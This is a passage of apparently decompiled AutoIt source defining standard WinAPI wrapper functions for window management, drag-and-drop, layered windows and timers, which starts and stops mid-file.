ENDFUNC FUNC _WINAPI_CHILDWINDOWFROMPOINTEX ($HWND , $TPOINT , $IFLAGS = 0 ) LOCAL $ARET = DLLCALL ("user32.dll" , "hwnd" , "ChildWindowFromPointEx" , "hwnd" , $HWND , "struct" , $TPOINT , "uint" , $IFLAGS ) IF @ERROR THEN RETURN SETERROR (@ERROR , @EXTENDED , 0 ) RETURN $ARET [0 ] ENDFUNC FUNC _WINAPI_CLOSEWINDOW ($HWND ) LOCAL $ARET = DLLCALL ("user32.dll" , "bool" , "CloseWindow" , "hwnd" , $HWND ) IF @ERROR THEN RETURN SETERROR (@ERROR , @EXTENDED , FALSE ) RETURN $ARET [0 ] ENDFUNC FUNC _WINAPI_DEFERWINDOWPOS ($HINFO , $HWND , $HAFTER , $IX , $IY , $IWIDTH , $IHEIGHT , $IFLAGS ) LOCAL $ARET = DLLCALL ("user32.dll" , "handle" , "DeferWindowPos" , "handle" , $HINFO , "hwnd" , $HWND , "hwnd" , $HAFTER , "int" , $IX , "int" , $IY , "int" , $IWIDTH , "int" , $IHEIGHT , "uint" , $IFLAGS ) IF @ERROR THEN RETURN SETERROR (@ERROR , @EXTENDED , 0 ) RETURN $ARET [0 ] ENDFUNC FUNC _WINAPI_DEFWINDOWPROC ($HWND , $IMSG , $WPARAM , $LPARAM ) LOCAL $ARESULT = DLLCALL ("user32.dll" , "lresult" , "DefWindowProc" , "hwnd" , $HWND , "uint" , $IMSG , "wparam" , $WPARAM , "lparam" , $LPARAM ) IF @ERROR THEN RETURN SETERROR (@ERROR , @EXTENDED , 0 ) RETURN $ARESULT [0 ] ENDFUNC FUNC _WINAPI_DEFWINDOWPROCW ($HWND , $IMSG , $WPARAM , $LPARAM ) LOCAL $ARET = DLLCALL ("user32.dll" , "lresult" , "DefWindowProcW" , "hwnd" , $HWND , "uint" , $IMSG , "wparam" , $WPARAM , "lparam" , $LPARAM ) IF @ERROR THEN RETURN SETERROR (@ERROR , @EXTENDED , 0 ) RETURN $ARET [0 ] ENDFUNC FUNC _WINAPI_DEREGISTERSHELLHOOKWINDOW ($HWND ) LOCAL $ARET = DLLCALL ("user32.dll" , "bool" , "DeregisterShellHookWindow" , "hwnd" , $HWND ) IF @ERROR THEN RETURN SETERROR (@ERROR , @EXTENDED , FALSE ) RETURN $ARET [0 ] ENDFUNC FUNC _WINAPI_DRAGACCEPTFILES ($HWND , $BACCEPT = TRUE ) DLLCALL ("shell32.dll" , "none" , "DragAcceptFiles" , "hwnd" , $HWND , "bool" , $BACCEPT ) IF @ERROR THEN RETURN SETERROR (@ERROR , @EXTENDED , 0 ) RETURN 1 ENDFUNC FUNC _WINAPI_DRAGFINISH ($HDROP ) DLLCALL ("shell32.dll" , "none" , "DragFinish" , "handle" , $HDROP ) IF @ERROR THEN RETURN SETERROR (@ERROR , @EXTENDED , 0 ) RETURN 1 ENDFUNC FUNC _WINAPI_DRAGQUERYFILEEX ($HDROP , $IFLAG = 0 ) LOCAL $ARET = DLLCALL ("shell32.dll" , "uint" , "DragQueryFileW" , "handle" , $HDROP , "uint" , + 4294967295 , "ptr" , 0 , "uint" , 0 ) IF @ERROR THEN RETURN SETERROR (@ERROR , @EXTENDED , 0 ) IF NOT $ARET [0 ] THEN RETURN SETERROR (10 , 0 , 0 ) LOCAL $ICOUNT = $ARET [0 ] LOCAL $ARESULT [$ICOUNT + 1 ] FOR $I = 0 TO $ICOUNT + 4294967295 $ARET = DLLCALL ("shell32.dll" , "uint" , "DragQueryFileW" , "handle" , $HDROP , "uint" , $I , "wstr" , "" , "uint" , 4096 ) IF NOT $ARET [0 ] THEN RETURN SETERROR (11 , 0 , 0 ) IF $IFLAG THEN LOCAL $BDIR = _WINAPI_PATHISDIRECTORY ($ARET [3 ] ) IF (($IFLAG = 1 ) AND $BDIR ) OR (($IFLAG = 2 ) AND NOT $BDIR ) THEN CONTINUELOOP ENDIF ENDIF $ARESULT [$I + 1 ] = $ARET [3 ] $ARESULT [0 ] += 1 NEXT IF NOT $ARESULT [0 ] THEN RETURN SETERROR (12 , 0 , 0 ) __INC ($ARESULT , + 4294967295 ) RETURN $ARESULT ENDFUNC FUNC _WINAPI_DRAGQUERYPOINT ($HDROP ) LOCAL $TPOINT = DLLSTRUCTCREATE ($TAGPOINT ) LOCAL $ARET = DLLCALL ("shell32.dll" , "bool" , "DragQueryPoint" , "handle" , $HDROP , "struct*" , $TPOINT ) IF @ERROR OR NOT $ARET [0 ] THEN RETURN SETERROR (@ERROR + 10 , @EXTENDED , 0 ) RETURN $TPOINT ENDFUNC FUNC _WINAPI_ENDDEFERWINDOWPOS ($HINFO ) LOCAL $ARET = DLLCALL ("user32.dll" , "bool" , "EndDeferWindowPos" , "handle" , $HINFO ) IF @ERROR THEN RETURN SETERROR (@ERROR , @EXTENDED , FALSE ) RETURN $ARET [0 ] ENDFUNC FUNC _WINAPI_ENUMCHILDWINDOWS ($HWND , $BVISIBLE = TRUE ) IF NOT _WINAPI_GETWINDOW ($HWND , 5 ) THEN RETURN SETERROR (2 , 0 , 0 ) LOCAL $HENUMPROC = DLLCALLBACKREGISTER ("__EnumWindowsProc" , "bool" , "hwnd;lparam" ) DIM $__G_VENUM [101 ] [2 ] = [[0 ] ] DLLCALL ("user32.dll" , "bool" , "EnumChildWindows" , "hwnd" , $HWND , "ptr" , DLLCALLBACKGETPTR ($HENUMPROC ) , "lparam" , $BVISIBLE ) IF @ERROR OR NOT $__G_VENUM [0 ] [0 ] THEN $__G_VENUM = @ERROR + 10 ENDIF DLLCALLBACKFREE ($HENUMPROC ) IF $__G_VENUM THEN RETURN SETERROR ($__G_VENUM , 0 , 0 ) __INC ($__G_VENUM , + 4294967295 ) RETURN $__G_VENUM ENDFUNC FUNC _WINAPI_FINDWINDOW ($SCLASSNAME , $SWINDOWNAME ) LOCAL $ARESULT = DLLCALL ("user32.dll" , "hwnd" , "FindWindowW" , "wstr" , $SCLASSNAME , "wstr" , $SWINDOWNAME ) IF @ERROR THEN RETURN SETERROR (@ERROR , @EXTENDED , 0 ) RETURN $ARESULT [0 ] ENDFUNC FUNC _WINAPI_FLASHWINDOW ($HWND , $BINVERT = TRUE ) LOCAL $ARESULT = DLLCALL ("user32.dll" , "bool" , "FlashWindow" , "hwnd" , $HWND , "bool" , $BINVERT ) IF @ERROR THEN RETURN SETERROR (@ERROR , @EXTENDED , FALSE ) RETURN $ARESULT [0 ] ENDFUNC FUNC _WINAPI_FLASHWINDOWEX ($HWND , $IFLAGS = 3 , $ICOUNT = 3 , $ITIMEOUT = 0 ) LOCAL $TFLASH = DLLSTRUCTCREATE ($TAGFLASHWINFO ) LOCAL $IFLASH = DLLSTRUCTGETSIZE ($TFLASH ) LOCAL $IMODE = 0 IF BITAND ($IFLAGS , 1 ) <> 0 THEN $IMODE = BITOR ($IMODE , $FLASHW_CAPTION ) IF BITAND ($IFLAGS , 2 ) <> 0 THEN $IMODE = BITOR ($IMODE , $FLASHW_TRAY ) IF BITAND ($IFLAGS , 4 ) <> 0 THEN $IMODE = BITOR ($IMODE , $FLASHW_TIMER ) IF BITAND ($IFLAGS , 8 ) <> 0 THEN $IMODE = BITOR ($IMODE , $FLASHW_TIMERNOFG ) DLLSTRUCTSETDATA ($TFLASH , "Size" , $IFLASH ) DLLSTRUCTSETDATA ($TFLASH , "hWnd" , $HWND ) DLLSTRUCTSETDATA ($TFLASH , "Flags" , $IMODE ) DLLSTRUCTSETDATA ($TFLASH , "Count" , $ICOUNT ) DLLSTRUCTSETDATA ($TFLASH , "Timeout" , $ITIMEOUT ) LOCAL $ARESULT = DLLCALL ("user32.dll" , "bool" , "FlashWindowEx" , "struct*" , $TFLASH ) IF @ERROR THEN RETURN SETERROR (@ERROR , @EXTENDED , FALSE ) RETURN $ARESULT [0 ] ENDFUNC FUNC _WINAPI_GETANCESTOR ($HWND , $IFLAGS = 1 ) LOCAL $ARESULT = DLLCALL ("user32.dll" , "hwnd" , "GetAncestor" , "hwnd" , $HWND , "uint" , $IFLAGS ) IF @ERROR THEN RETURN SETERROR (@ERROR , @EXTENDED , 0 ) RETURN $ARESULT [0 ] ENDFUNC FUNC _WINAPI_GETCLASSINFOEX ($SCLASS , $HINSTANCE = 0 ) LOCAL $STYPEOFCLASS = "ptr" IF ISSTRING ($SCLASS ) THEN $STYPEOFCLASS = "wstr" ENDIF LOCAL $TWNDCLASSEX = DLLSTRUCTCREATE ($TAGWNDCLASSEX ) LOCAL $ARET = DLLCALL ("user32.dll" , "bool" , "GetClassInfoExW" , "handle" , $HINSTANCE , $STYPEOFCLASS , $SCLASS , "struct*" , $TWNDCLASSEX ) IF @ERROR OR NOT $ARET [0 ] THEN RETURN SETERROR (@ERROR + 10 , @EXTENDED , 0 ) RETURN $TWNDCLASSEX ENDFUNC FUNC _WINAPI_GETCLASSLONGEX ($HWND , $IINDEX ) LOCAL $ARET IF @AUTOITX64 THEN $ARET = DLLCALL ("user32.dll" , "ulong_ptr" , "GetClassLongPtrW" , "hwnd" , $HWND , "int" , $IINDEX ) ELSE $ARET = DLLCALL ("user32.dll" , "dword" , "GetClassLongW" , "hwnd" , $HWND , "int" , $IINDEX ) ENDIF IF @ERROR OR NOT $ARET [0 ] THEN RETURN SETERROR (@ERROR , @EXTENDED , 0 ) RETURN $ARET [0 ] ENDFUNC FUNC _WINAPI_GETCLIENTHEIGHT ($HWND ) LOCAL $TRECT = _WINAPI_GETCLIENTRECT ($HWND ) IF @ERROR THEN RETURN SETERROR (@ERROR , @EXTENDED , 0 ) RETURN DLLSTRUCTGETDATA ($TRECT , "Bottom" ) - DLLSTRUCTGETDATA ($TRECT , "Top" ) ENDFUNC FUNC _WINAPI_GETCLIENTWIDTH ($HWND ) LOCAL $TRECT = _WINAPI_GETCLIENTRECT ($HWND ) IF @ERROR THEN RETURN SETERROR (@ERROR , @EXTENDED , 0 ) RETURN DLLSTRUCTGETDATA ($TRECT , "Right" ) - DLLSTRUCTGETDATA ($TRECT , "Left" ) ENDFUNC FUNC _WINAPI_GETDLGITEM ($HWND , $IITEMID ) LOCAL $ARESULT = DLLCALL ("user32.dll" , "hwnd" , "GetDlgItem" , "hwnd" , $HWND , "int" , $IITEMID ) IF @ERROR THEN RETURN SETERROR (@ERROR , @EXTENDED , 0 ) RETURN $ARESULT [0 ] ENDFUNC FUNC _WINAPI_GETFOREGROUNDWINDOW () LOCAL $ARESULT = DLLCALL ("user32.dll" , "hwnd" , "GetForegroundWindow" ) IF @ERROR THEN RETURN SETERROR (@ERROR , @EXTENDED , 0 ) RETURN $ARESULT [0 ] ENDFUNC FUNC _WINAPI_GETGUITHREADINFO ($ITHREADID ) LOCAL CONST $TAGGUITHREADINFO = "dword Size;dword Flags;hwnd hWndActive;hwnd hWndFocus;hwnd hWndCapture;hwnd hWndMenuOwner;hwnd hWndMoveSize;hwnd hWndCaret;struct rcCaret;long left;long top;long right;long bottom;endstruct" LOCAL $TGTI = DLLSTRUCTCREATE ($TAGGUITHREADINFO ) DLLSTRUCTSETDATA ($TGTI , 1 , DLLSTRUCTGETSIZE ($TGTI ) ) LOCAL $ARET = DLLCALL ("user32.dll" , "bool" , "GetGUIThreadInfo" , "dword" , $ITHREADID , "struct*" , $TGTI ) IF @ERROR OR NOT $ARET [0 ] THEN RETURN SETERROR (@ERROR + 10 , @EXTENDED , 0 ) LOCAL $ARESULT [11 ] FOR $I = 0 TO 10 $ARESULT [$I ] = DLLSTRUCTGETDATA ($TGTI , $I + 2 ) NEXT FOR $I = 9 TO 10 $ARESULT [$I ] -= $ARESULT [$I + 4294967294 ] NEXT RETURN $ARESULT ENDFUNC FUNC _WINAPI_GETLASTACTIVEPOPUP ($HWND ) LOCAL $ARET = DLLCALL ("user32.dll" , "hwnd" , "GetLastActivePopup" , "hwnd" , $HWND ) IF @ERROR OR NOT $ARET [0 ] THEN RETURN SETERROR (@ERROR + 10 , @EXTENDED , 0 ) IF $ARET [0 ] = $HWND THEN RETURN SETERROR (1 , 0 , 0 ) RETURN $ARET [0 ] ENDFUNC FUNC _WINAPI_GETLAYEREDWINDOWATTRIBUTES ($HWND , BYREF $ITRANSCOLOR , BYREF $ITRANSGUI , $BCOLORREF = FALSE ) $ITRANSCOLOR = + 4294967295 $ITRANSGUI = + 4294967295 LOCAL $ARESULT = DLLCALL ("user32.dll" , "bool" , "GetLayeredWindowAttributes" , "hwnd" , $HWND , "INT*" , $ITRANSCOLOR , "byte*" , $ITRANSGUI , "dword*" , 0 ) IF @ERROR OR NOT $ARESULT [0 ] THEN RETURN SETERROR (@ERROR , @EXTENDED , 0 ) IF NOT $BCOLORREF THEN $ARESULT [2 ] = INT (BINARYMID ($ARESULT [2 ] , 3 , 1 ) & BINARYMID ($ARESULT [2 ] , 2 , 1 ) & BINARYMID ($ARESULT [2 ] , 1 , 1 ) ) ENDIF $ITRANSCOLOR = $ARESULT [2 ] $ITRANSGUI = $ARESULT [3 ] RETURN $ARESULT [4 ] ENDFUNC FUNC _WINAPI_GETMESSAGEEXTRAINFO () LOCAL $ARET = DLLCALL ("user32.dll" , "lparam" , "GetMessageExtraInfo" ) IF @ERROR THEN RETURN SETERROR (@ERROR , @EXTENDED , 0 ) RETURN $ARET [0 ] ENDFUNC FUNC _WINAPI_GETSHELLWINDOW () LOCAL $ARET = DLLCALL ("user32.dll" , "hwnd" , "GetShellWindow" ) IF @ERROR THEN RETURN SETERROR (@ERROR , @EXTENDED , 0 ) RETURN $ARET [0 ] ENDFUNC FUNC _WINAPI_GETTOPWINDOW ($HWND ) LOCAL $ARET = DLLCALL ("user32.dll" , "hwnd" , "GetTopWindow" , "hwnd" , $HWND ) IF @ERROR THEN RETURN SETERROR (@ERROR , @EXTENDED , 0 ) RETURN $ARET [0 ] ENDFUNC FUNC _WINAPI_GETWINDOWDISPLAYAFFINITY ($HWND ) LOCAL $ARET = DLLCALL ("user32.dll" , "bool" , "GetWindowDisplayAffinity" , "hwnd" , $HWND , "dword*" , 0 ) IF @ERROR OR NOT $ARET [0 ] THEN RETURN SETERROR (@ERROR + 10 , @EXTENDED , 0 ) RETURN $ARET [2 ] ENDFUNC FUNC _WINAPI_GETWINDOWINFO ($HWND ) LOCAL $TWINDOWINFO = DLLSTRUCTCREATE ($TAGWINDOWINFO ) DLLSTRUCTSETDATA ($TWINDOWINFO , "Size" , DLLSTRUCTGETSIZE ($TWINDOWINFO ) ) LOCAL $ARET = DLLCALL ("user32.dll" , "bool" , "GetWindowInfo" , "hwnd" , $HWND , "struct*" , $TWINDOWINFO ) IF @ERROR OR NOT $ARET [0 ] THEN RETURN SETERROR (@ERROR + 10 , @EXTENDED , 0 ) RETURN $TWINDOWINFO ENDFUNC FUNC _WINAPI_GETWINDOWPLACEMENT ($HWND ) LOCAL $TWINDOWPLACEMENT = DLLSTRUCTCREATE ($TAGWINDOWPLACEMENT ) DLLSTRUCTSETDATA ($TWINDOWPLACEMENT , "length" , DLLSTRUCTGETSIZE ($TWINDOWPLACEMENT ) ) LOCAL $ARET = DLLCALL ("user32.dll" , "bool" , "GetWindowPlacement" , "hwnd" , $HWND , "struct*" , $TWINDOWPLACEMENT ) IF @ERROR OR NOT $ARET [0 ] THEN RETURN SETERROR (@ERROR + 10 , @EXTENDED , 0 ) RETURN $TWINDOWPLACEMENT ENDFUNC FUNC _WINAPI_ISCHILD ($HWND , $HWNDPARENT ) LOCAL $ARET = DLLCALL ("user32.dll" , "bool" , "IsChild" , "hwnd" , $HWNDPARENT , "hwnd" , $HWND ) IF @ERROR THEN RETURN SETERROR (@ERROR , @EXTENDED , FALSE ) RETURN $ARET [0 ] ENDFUNC FUNC _WINAPI_ISHUNGAPPWINDOW ($HWND ) LOCAL $ARET = DLLCALL ("user32.dll" , "bool" , "IsHungAppWindow" , "hwnd" , $HWND ) IF @ERROR THEN RETURN SETERROR (@ERROR , @EXTENDED , FALSE ) RETURN $ARET [0 ] ENDFUNC FUNC _WINAPI_ISICONIC ($HWND ) LOCAL $ARET = DLLCALL ("user32.dll" , "bool" , "IsIconic" , "hwnd" , $HWND ) IF @ERROR THEN RETURN SETERROR (@ERROR , @EXTENDED , FALSE ) RETURN $ARET [0 ] ENDFUNC FUNC _WINAPI_ISWINDOWUNICODE ($HWND ) LOCAL $ARET = DLLCALL ("user32.dll" , "bool" , "IsWindowUnicode" , "hwnd" , $HWND ) IF @ERROR THEN RETURN SETERROR (@ERROR , @EXTENDED , FALSE ) RETURN $ARET [0 ] ENDFUNC FUNC _WINAPI_ISZOOMED ($HWND ) LOCAL $ARET = DLLCALL ("user32.dll" , "bool" , "IsZoomed" , "hwnd" , $HWND ) IF @ERROR THEN RETURN SETERROR (@ERROR , @EXTENDED , FALSE ) RETURN $ARET [0 ] ENDFUNC FUNC _WINAPI_KILLTIMER ($HWND , $ITIMERID ) LOCAL $ARET = DLLCALL ("user32.dll" , "bool" , "KillTimer" , "hwnd" , $HWND , "uint_ptr" , $ITIMERID ) IF @ERROR THEN RETURN SETERROR (@ERROR , @EXTENDED , 0 ) RETURN $ARET [0 ] ENDFUNC FUNC _WINAPI_OPENICON ($HWND ) LOCAL $ARET = DLLCALL ("user32.dll" , "bool" , "OpenIcon" , "hwnd" , $HWND ) IF @ERROR THEN RETURN SETERROR (@ERROR , @EXTENDED , 0 ) RETURN $ARET [0 ] ENDFUNC FUNC _WINAPI_POSTMESSAGE ($HWND , $IMSG , $WPARAM , $LPARAM ) LOCAL $ARESULT = DLLCALL ("user32.dll" , "bool" , "PostMessage" , "hwnd" , $HWND , "uint" , $IMSG , "wparam" , $WPARAM , "lparam" , $LPARAM ) IF @ERROR THEN RETURN SETERROR (@ERROR , @EXTENDED , FALSE ) RETURN $ARESULT [0 ] ENDFUNC FUNC _WINAPI_REGISTERCLASS ($TWNDCLASS ) LOCAL $ARET = DLLCALL ("user32.dll" , "word" , "RegisterClassW" , "struct*" , $TWNDCLASS ) IF @ERROR THEN RETURN SETERROR (@ERROR , @EXTENDED , 0 ) RETURN $ARET [0 ] ENDFUNC FUNC _WINAPI_REGISTERCLASSEX ($TWNDCLASSEX ) LOCAL $ARET = DLLCALL ("user32.dll" , "word" , "RegisterClassExW" , "struct*" , $TWNDCLASSEX ) IF @ERROR THEN RETURN SETERROR (@ERROR , @EXTENDED , 0 ) RETURN $ARET [0 ] ENDFUNC FUNC _WINAPI_REGISTERSHELLHOOKWINDOW ($HWND ) LOCAL $ARET = DLLCALL ("user32.dll" , "bool" , "RegisterShellHookWindow" , "hwnd" , $HWND ) IF @ERROR THEN RETURN SETERROR (@ERROR , @EXTENDED , FALSE ) RETURN $ARET [0 ] ENDFUNC FUNC _WINAPI_REGISTERWINDOWMESSAGE ($SMESSAGE ) LOCAL $ARESULT = DLLCALL ("user32.dll" , "uint" , "RegisterWindowMessageW" , "wstr" , $SMESSAGE ) IF @ERROR THEN RETURN SETERROR (@ERROR , @EXTENDED , 0 ) RETURN $ARESULT [0 ] ENDFUNC FUNC _WINAPI_SENDMESSAGETIMEOUT ($HWND , $IMSG , $WPARAM = 0 , $LPARAM = 0 , $ITIMEOUT = 1000 , $IFLAGS = 0 ) LOCAL $ARET = DLLCALL ("user32.dll" , "lresult" , "SendMessageTimeoutW" , "hwnd" , $HWND , "uint" , $IMSG , "wparam" , $WPARAM , "lparam" , $LPARAM , "uint" , $IFLAGS , "uint" , $ITIMEOUT , "dword_ptr*" , 0 ) IF @ERROR THEN RETURN SETERROR (@ERROR , @EXTENDED , + 4294967295 ) IF NOT $ARET [0 ] THEN RETURN SETERROR (10 , _WINAPI_GETLASTERROR () , + 4294967295 ) RETURN $ARET [7 ] ENDFUNC FUNC _WINAPI_SETCLASSLONGEX ($HWND , $IINDEX , $INEWLONG ) LOCAL $ARET IF @AUTOITX64 THEN $ARET = DLLCALL ("user32.dll" , "ulong_ptr" , "SetClassLongPtrW" , "hwnd" , $HWND , "int" , $IINDEX , "long_ptr" , $INEWLONG ) ELSE $ARET = DLLCALL ("user32.dll" , "dword" , "SetClassLongW" , "hwnd" , $HWND , "int" , $IINDEX , "long" , $INEWLONG ) ENDIF IF @ERROR THEN RETURN SETERROR (@ERROR , @EXTENDED , 0 ) RETURN $ARET [0 ] ENDFUNC FUNC _WINAPI_SETFOREGROUNDWINDOW ($HWND ) LOCAL $ARET = DLLCALL ("user32.dll" , "bool" , "SetForegroundWindow" , "hwnd" , $HWND ) IF @ERROR THEN RETURN SETERROR (@ERROR , @EXTENDED , FALSE ) RETURN $ARET [0 ] ENDFUNC FUNC _WINAPI_SETLAYEREDWINDOWATTRIBUTES ($HWND , $ITRANSCOLOR , $ITRANSGUI = 255 , $IFLAGS = 3 , $BCOLORREF = FALSE ) IF $IFLAGS = DEFAULT OR $IFLAGS = "" OR $IFLAGS < 0 THEN $IFLAGS = 3 IF NOT $BCOLORREF THEN $ITRANSCOLOR = INT (BINARYMID ($ITRANSCOLOR , 3 , 1 ) & BINARYMID ($ITRANSCOLOR , 2 , 1 ) & BINARYMID ($ITRANSCOLOR , 1 , 1 ) ) ENDIF LOCAL $ARESULT = DLLCALL ("user32.dll" , "bool" , "SetLayeredWindowAttributes" , "hwnd" , $HWND , "INT" , $ITRANSCOLOR , "byte" , $ITRANSGUI , "dword" , $IFLAGS ) IF @ERROR THEN RETURN SETERROR (@ERROR , @EXTENDED , FALSE ) RETURN $ARESULT [0 ] ENDFUNC FUNC _WINAPI_SETMESSAGEEXTRAINFO ($LPARAM ) LOCAL $ARET = DLLCALL ("user32.dll" , "lparam" , "SetMessageExtraInfo" , "lparam" , $LPARAM ) IF @ERROR THEN RETURN SETERROR (@ERROR , @EXTENDED , 0 ) RETURN $ARET [0 ] ENDFUNC FUNC _WINAPI_SETSYSCOLORS ($VELEMENTS , $VCOLORS ) LOCAL $BISEARRAY = ISARRAY ($VELEMENTS ) , $BISCARRAY = ISARRAY ($VCOLORS ) LOCAL $IELEMENTNUM IF NOT $BISCARRAY AND NOT $BISEARRAY THEN $IELEMENTNUM = 1 ELSEIF $BISCARRAY OR $BISEARRAY THEN IF NOT $BISCARRAY OR NOT $BISEARRAY THEN RETURN SETERROR (+ 4294967295 , + 4294967295 , FALSE ) IF UBOUND ($VELEMENTS ) <> UBOUND ($VCOLORS ) THEN RETURN SETERROR (+ 4294967295 , + 4294967295 , FALSE ) $IELEMENTNUM = UBOUND ($VELEMENTS ) ENDIF LOCAL $TELEMENTS = DLLSTRUCTCREATE ("int Element[" & $IELEMENTNUM & "]" ) LOCAL $TCOLORS = DLLSTRUCTCREATE ("INT NewColor[" & $IELEMENTNUM & "]" ) IF NOT $BISEARRAY THEN DLLSTRUCTSETDATA ($TELEMENTS , "Element" , $VELEMENTS , 1 ) ELSE FOR $X = 0 TO $IELEMENTNUM + 4294967295 DLLSTRUCTSETDATA ($TELEMENTS , "Element" , $VELEMENTS [$X ] , $X + 1 ) NEXT ENDIF IF NOT $BISCARRAY THEN DLLSTRUCTSETDATA ($TCOLORS , "NewColor" , $VCOLORS , 1 ) ELSE FOR $X = 0 TO $IELEMENTNUM + 4294967295 DLLSTRUCTSETDATA ($TCOLORS , "NewColor" , $VCOLORS [$X ] , $X + 1 ) NEXT ENDIF LOCAL $ARESULT = DLLCALL ("user32.dll" , "bool" , "SetSysColors" , "int" , $IELEMENTNUM , "struct*" , $TELEMENTS , "struct*" , $TCOLORS ) IF @ERROR THEN RETURN SETERROR (@ERROR , @EXTENDED , FALSE ) RETURN $ARESULT [0 ] ENDFUNC FUNC _WINAPI_SETTIMER ($HWND , $ITIMERID , $IELAPSE , $PTIMERFUNC ) LOCAL $ARET = DLLCALL ("user32.dll" , "uint_ptr" , "SetTimer" , "hwnd" , $HWND , "uint_ptr" , $ITIMERID , "uint" , $IELAPSE , "ptr" , $PTIMERFUNC ) IF @ERROR THEN RETURN SETERROR (@ERROR , @EXTENDED , 0 ) RETURN $ARET [0 ] ENDFUNC FUNC _WINAPI_SETWINDOWDISPLAYAFFINITY ($HWND , $IAFFINITY ) LOCAL $ARET = DLLCALL ("user32.dll" , "bool" , "SetWindowDisplayAffinity" , "hwnd" , $HWND , "dword" , $IAFFINITY ) IF @ERROR THEN RETURN SETERROR (@ERROR , @EXTENDED , FALSE ) RETURN $ARET [0 ] ENDFUNC FUNC _WINAPI_SETWINDOWLONG ($HWND , $IINDEX , $IVALUE ) _WINAPI_SETLASTERROR (0 ) LOCAL $SFUNCNAME = "SetWindowLongW" IF @AUTOITX64 THEN $SFUNCNAME = "SetWindowLongPtrW" LOCAL $ARESULT = DLLCALL ("user32.dll" , "long_ptr" , $SFUNCNAME , "hwnd" , $HWND , "int" , $IINDEX , "long_ptr" , $IVALUE ) IF @ERROR THEN RETURN SETERROR (@ERROR , @EXTENDED , 0 ) RETURN $ARESULT [0 ] ENDFUNC FUNC _WINAPI_SETWINDOWPLACEMENT ($HWND , $TWINDOWPLACEMENT ) LOCAL $ARESULT = DLLCALL ("user32.dll" , "bool" , "SetWindowPlacement" , "hwnd" , $HWND , "struct*" , $TWINDOWPLACEMENT ) IF @ERROR THEN RETURN SETERROR (@ERROR , @EXTENDED , FALSE ) RETURN $ARESULT [0 ] ENDFUNC FUNC _WINAPI_SHOWOWNEDPOPUPS ($HWND , $BSHOW ) LOCAL $ARET = DLLCALL ("user32.dll" , "bool" , "ShowOwnedPopups" , "hwnd" , $HWND , "bool" , $BSHOW ) IF @ERROR THEN RETURN SETERROR (@ERROR , @EXTENDED , FALSE ) RETURN $ARET [0 ] ENDFUNC FUNC _WINAPI_SWITCHTOTHISWINDOW ($HWND , $BALTTAB = FALSE ) DLLCALL ("user32.dll" , "none" , "SwitchToThisWindow" , "hwnd" , $HWND , "bool" , $BALTTAB ) IF @ERROR THEN RETURN SETERROR (@ERROR , @EXTENDED , 0 ) RETURN 1 ENDFUNC FUNC _WINAPI_TILEWINDOWS ($AWNDS , $TRECT = 0 , $HPARENT = 0 , $IFLAGS = 0 , $ISTART = 0 , $IEND = + 4294967295 ) IF __CHECKERRORARRAYBOUNDS ($AWNDS , $ISTART , $IEND ) THEN RETURN SETERROR (@ERROR + 10 , @EXTENDED , 0 ) LOCAL $ICOUNT = $IEND - $ISTART + 1 LOCAL $TWNDS = DLLSTRUCTCREATE ("hwnd[" & $ICOUNT & "]" ) $ICOUNT = 1 FOR $I = $ISTART TO $IEND DLLSTRUCTSETDATA ($TWNDS , 1 , $AWNDS [$I ] , $ICOUNT ) $ICOUNT += 1 NEXT LOCAL $ARET = DLLCALL ("user32.dll" , "word" , "TileWindows" , "hwnd" , $HPARENT , "uint" , $IFLAGS , "struct*" , $TRECT , "uint" , $ICOUNT + 4294967295 , "struct*" , $TWNDS ) IF @ERROR THEN RETURN SETERROR (@ERROR , @EXTENDED , 0 ) RETURN $ARET [0 ] ENDFUNC FUNC _WINAPI_UNREGISTERCLASS ($SCLASS , $HINSTANCE = 0 ) LOCAL $STYPEOFCLASS = "ptr" IF ISSTRING ($SCLASS ) THEN $STYPEOFCLASS = "wstr" ENDIF LOCAL $ARET = DLLCALL ("user32.dll" , "bool" , "UnregisterClassW" , $STYPEOFCLASS , $SCLASS , "handle" , $HINSTANCE ) IF @ERROR THEN RETURN SETERROR (@ERROR , @EXTENDED , FALSE ) RETURN $ARET [0 ] ENDFUNC FUNC _WINAPI_UPDATELAYEREDWINDOW ($HWND , $HDESTDC , $TPTDEST , $TSIZE , $HSRCDC , $TPTSRCE , $IRGB , $TBLEND , $IFLAGS ) LOCAL $ARESULT = DLLCALL ("user32.dll" , "bool" , "UpdateLayeredWindow" , "hwnd" , $HWND , "handle" , $HDESTDC , "struct*" , $TPTDEST , "struct*" , $TSIZE , "handle" , $HSRCDC , "struct*" , $TPTSRCE , "dword" , $IRGB , "struct*" , $TBLEND , "dword" , $IFLAGS ) IF @ERROR THEN RETURN SETERROR (@ERROR , @EXTENDED , FALSE ) RETURN $ARESULT [0 ] ENDFUNC FUNC _WINAPI_UPDATELAYEREDWINDOWEX ($HWND , $IX , $IY , $HBITMAP , $IOPACITY = 255 , $BDELETE = FALSE ) LOCAL $ARET = DLLCALL ("user32.dll" , "handle" , "GetDC" , "hwnd" , $HWND ) LOCAL $HDC = $ARET [0 ] $ARET = DLLCALL ("gdi32.dll" , "handle" , "CreateCompatibleDC" , "handle" , $HDC ) LOCAL $HDESTDC = $ARET [0 ] $ARET = DLLCALL ("gdi32.dll" , "handle" , "SelectObject" , "handle" , $HDESTDC , "handle" , $HBITMAP ) LOCAL $HDESTSV = $ARET [0 ] LOCAL $TPOINT IF ($IX = + 4294967295 ) AND ($IY = + 4294967295 ) THEN $TPOINT = DLLSTRUCTCREATE ("int;int" ) ELSE $TPOINT = DLLSTRUCTCREATE ("int;int;int;int" ) DLLSTRUCTSETDATA ($TPOINT , 3 , $IX ) DLLSTRUCTSETDATA ($TPOINT , 4 , $IY ) ENDIF DLLSTRUCTSETDATA ($TPOINT , 1 , 0 ) DLLSTRUCTSETDATA ($TPOINT , 2 , 0 ) LOCAL $TBLENDFUNCTION = DLLSTRUCTCREATE ($TAGBLENDFUNCTION ) DLLSTRUCTSETDATA ($TBLENDFUNCTION , 1 , 0 ) DLLSTRUCTSETDATA ($TBLENDFUNCTION , 2 , 0 ) DLLSTRUCTSETDATA ($TBLENDFUNCTION , 3 , $IOPACITY ) DLLSTRUCTSETDATA ($TBLENDFUNCTION , 4 , 1 ) LOCAL CONST $TAGBITMAP = "struct;long bmType;long bmWidth;long bmHeight;long bmWidthBytes;ushort bmPlanes;ushort bmBitsPixel;ptr bmBits;endstruct" LOCAL $TOBJ = DLLSTRUCTCREATE ($TAGBITMAP ) DLLCALL ("gdi32.dll" , "int" , "GetObject" , "handle" , $HBITMAP , "int" , DLLSTRUCTGETSIZE ($TOBJ ) , "struct*" , $TOBJ ) LOCAL $TSIZE = 